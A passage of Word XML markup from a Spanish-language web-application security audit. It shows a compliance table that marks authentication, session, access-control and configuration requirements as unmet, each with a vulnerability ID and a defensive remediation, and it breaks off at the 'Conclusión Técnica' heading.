            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) con Argon2id o bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="3E4E0148" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A844924" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V6 – Autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF6B754" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protección contra fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E3F5C6" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>El sistema debe limitar o retardar los intentos fallidos de autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="425861C1" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53AB0520" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-1, VUL-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F0788F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implementar bloqueo temporal o CAPTCHA tras N intentos fallidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="4DC1CF9A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5194003F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V7 – Gestión de Sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35DA499A" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Regeneración del identificador de sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1246752F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>El ID de sesión debe regenerarse tras un cambio de nivel de privilegio (login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="340A568E" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA74E32" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C6F8804" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Invocar session_regenerate_id(true) inmediatamente tras autenticar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="7875EF8D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F463218" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V7 – Gestión de Sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62FC92D1" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Atributos seguros de cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E993C70" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Las cookies de sesión deben configurarse con HttpOnly, Secure y SameSite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27B0465E" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30884809" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77404A79" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>session.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_httponly=1, cookie_samesite=Strict y Secure (HTTPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="798F4D39" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F73EE21" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V8 – Control de Acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D835634" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Verificación de autorización en el servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328F1083" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Toda acción sensible debe validar la sesión/autorización en el backend, no solo ocultarse en la interfaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357942BD" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08021BA3" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53EB00EC" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validar $_SESSION en cada endpoint antes de ejecutar la acción solicitada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="5E6E9339" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09928EB4" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V8 – Control de Acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="567940C4" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Autorización a nivel de objeto (anti-IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B693F2" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Debe validarse que el recurso solicitado exista y sea accesible para el contexto actual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B565E3D" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6A3442" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6463A99B" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validar existencia y autorización del recurso antes de asignarlo a la sesión o consultarlo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="62B7A881" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5312CB78" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V8 – Control de Acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1314ABAA" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protección contra CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B0A4FE8" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Las operaciones que cambian estado deben incluir tokens anti-CSRF únicos por sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A84521" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5370F8A0" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-11, VUL-12, VUL-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FFEF2DC" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implementar y validar tokens CSRF en cada formulario/solicitud AJAX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="67B7282A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC83AC0" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V13 – Configuración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E82A215" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Gestión de secretos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6490BA4C" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Las credenciales no deben estar embebidas en el código fuente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F47D811" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2238D194" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78CCE697" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Externalizar credenciales a variables de entorno (.env) fuera del control de versiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="60B3D479" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="788CB017" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V13 – Configuración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484C6495" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Manejo controlado de errores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35BB7648" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Los errores de la aplicación no deben exponer información técnica interna al usuario final</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B56CF0" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="122129A7" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D47A5E4" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deshabilitar display_errors en producción y validar el resultado de mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>query(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) antes de usarlo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DEB0C15" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="50E95F6F" w14:textId="082660A1" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F49334" w14:textId="14611725" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F5086F" w14:textId="77777777" w:rsidR="001F6BF4" w:rsidRPr="00AE37FA" w:rsidRDefault="001F6BF4" w:rsidP="001F6BF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE37FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Conclusión Técnica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68514FB5" w14:textId="77777777" w:rsidR="00AE37FA" w:rsidRDefault="00AE37FA" w:rsidP="001F6BF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7EFA9F" w14:textId="18F310BD" w:rsidR="43C70DCE" w:rsidRDefault="43C70DCE" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
